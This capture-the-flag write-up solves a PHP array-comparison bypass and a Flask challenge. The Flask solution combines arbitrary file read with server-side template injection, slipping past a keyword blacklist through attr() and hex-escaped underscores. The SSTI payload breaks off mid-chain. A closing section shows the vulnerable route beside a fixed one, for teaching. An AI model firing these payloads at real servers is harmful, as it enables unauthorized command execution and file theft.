ezphp
Bypass directly with arrays and execute a command
GET: usn[]=1&usn1[]=1&sign=env
POST: pwd[]=2&pwd1[]=2
ez_python
The file parameter gives arbitrary file read
Read the source: ?file=app.py
from flask import Flask, request, render_template_string
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address
import waf

app = Flask(__name__)
# Rate limiting: 300 requests per day, 75 per hour
limiter = Limiter(get_remote_address, app=app, default_limits=["300 per day", "75 per hour"])

@app.route('/')
@limiter.exempt  # Exempt the index route from rate limiting
def index():
    file_path = request.args.get('file')
    if file_path and "proc" in file_path:
        return "只过滤了proc,别想用这个了,去读源码", 200  # Message in Chinese: "Only filtered 'proc', don't think about using this, read the source code"
    if file_path:
        try:
            with open(file_path, 'r') as file:
                file_content = file.read()
                return f"{file_content}"
        except Exception as e:
            return f"Error reading file: {e}"
    return "Find the get parameter to read something"

@app.route('/shell')
@limiter.limit("10 per minute")  # Rate limit: 10 requests per minute
def shell():
    if request.args.get('name'):
        person = request.args.get('name')
        if not waf.waf_check(person):
            mistake = "Something is banned"
            return mistake
        template = 'Hi, %s' % person
        return render_template_string(template)
    some = 'who you are?'
    return render_template_string(some)

@app.errorhandler(429)  # Custom handler for 429 Too Many Requests
def ratelimit_error(e):
    return "工具? 毫无意义,去手搓", 429  # Message in Chinese: "Tools? Pointless, craft it by hand"
Auditing the code: an obvious SSTI (template injection).
From the earlier import waf we know a waf file exists; read it with ?file=waf.py
def waf_check(value):
    dangerous_patterns = [
        'os', 'set', '__builtins__', '=', '.', '{{', '}}', 'popen', '+', '__'
    ]
    for pattern in dangerous_patterns:
        if pattern in value:
            return False
    return True
A simple bypass is enough; there are quite a few ways.
Use attr to get around the dot (.), and the \x5f\x5f encoding to get around __
?name={%print(%22%22|attr(%22\x5f\x5fclass\x5f\x5f%22)|attr(%22\x5f\x5fbase\x5f\x5f%22)|attr(%22\x5f\x5fsubclasses\x5f\x5f%22)()|attr(%22\x5f\x5fgetitem\x5f\x5f%22)
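As an added example (not the challenge's own code), the /shell sink from app.py beside a fixed route that keeps the template constant and passes the name as a context variable, so Jinja2 treats it as data and HTML-escapes it; the blacklist in waf.py is not the fix. It assumes Flask is installed and uses Flask's test client so it runs offline.

```python
from flask import Flask, request, render_template_string

app = Flask(__name__)


@app.route('/vuln')
def vuln():
    # Same pattern as the challenge's /shell route: the user value is
    # spliced into the template source, so Jinja2 syntax in it is executed.
    person = request.args.get('name', 'who you are?')
    return render_template_string('Hi, %s' % person)


@app.route('/fixed')
def fixed():
    # Fixed: the template is a constant; `name` is a context variable.
    # render_template_string autoescapes, so the value is also HTML-escaped.
    person = request.args.get('name', 'who you are?')
    return render_template_string('Hi, {{ name }}', name=person)


def render(path, name):
    """Fetch `path` with ?name=<name> through the test client (constructed input)."""
    with app.test_client() as client:
        return client.get(path, query_string={'name': name}).get_data(as_text=True)


if __name__ == '__main__':
    probe = '{{ 7*7 }}'  # constructed probe: an expression, not an attack payload
    print(render('/vuln', probe))   # prints "Hi, 49": the expression was evaluated
    print(render('/fixed', probe))  # prints "Hi, {{ 7*7 }}": rendered as plain data
```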